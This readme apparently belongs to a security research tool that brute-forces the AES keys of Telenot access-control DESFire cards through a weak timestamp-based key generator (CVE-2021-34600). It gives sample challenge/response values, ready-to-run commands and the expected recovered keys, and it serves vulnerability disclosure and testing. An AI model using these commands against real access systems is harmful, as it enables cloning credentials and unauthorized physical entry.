tools/mfd_aes_brute/readme.txt

   1 # AUTH AES
   2 #
   3 #  blog:  https://x41-dsec.de/lab/blog/telenot-complex-insecure-keygen/
   4 #
   5 # Recover the AES key for Telenot Access system's desfire cards.
   6 # CVE-2021-34600
   7 #
   8 # Finds the UNIX timestamp an AES key created with compasX version older than 32.0 has been generated.
   9 # Will not work on access tokens afterwards.
  10 #
  11
  12
  13 # Unix time stamp 2006-01-01
  14 1136073600
  15
  16 # reader challenge
  17 3fda933e2953ca5e6cfbbf95d1b51ddf
  18
  19 # tag resp, challenge
  20 97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
  21
  22
  23 #
  24 # Original source code by authors
  25 #
  26
  27 # simple
  28 ./brute_key 1605394800 bb6aea729414a5b1eff7b16328ce37fd 82f5f498dbc29f7570102397a2e5ef2b6dc14a864f665b3c54d11765af81e95c
  29
  30 # complex
  31 ./brute_key 1136073600 3fda933e2953ca5e6cfbbf95d1b51ddf 97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
  32
  33
  34 #
  35 # Multi threaded version (Iceman)
  36 #
  37
  38 # simple
  39 ./mfd_aes_brute 1605394800 bb6aea729414a5b1eff7b16328ce37fd 82f5f498dbc29f7570102397a2e5ef2b6dc14a864f665b3c54d11765af81e95c
  40
  41 expected result:
  42 261c07a23f2bc8262f69f10a5bdf3764
  43
  44
  45 Bruteforce using 8 threads
  46 Found timestamp........ 1631100305  ( '2021-09-08 13:25:05' )
  47 key.................... 261c07a23f2bc8262f69f10a5bdf3764
  48 execution time 1.00 sec
  49
  50 #
  51 # complex
  52 ./mfd_aes_brute 1136073600 3fda933e2953ca5e6cfbbf95d1b51ddf 97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
  53
  54 expected result:
  55 e757178e13516a4f3171bc6ea85e165a
  56
  57
  58 Bruteforce using 8 threads
  59 Found timestamp........ 1606834416  ( '2020-12-01 15:53:36' )
  60 key.................... e757178e13516a4f3171bc6ea85e165a
  61 execution time 18.54 sec
  62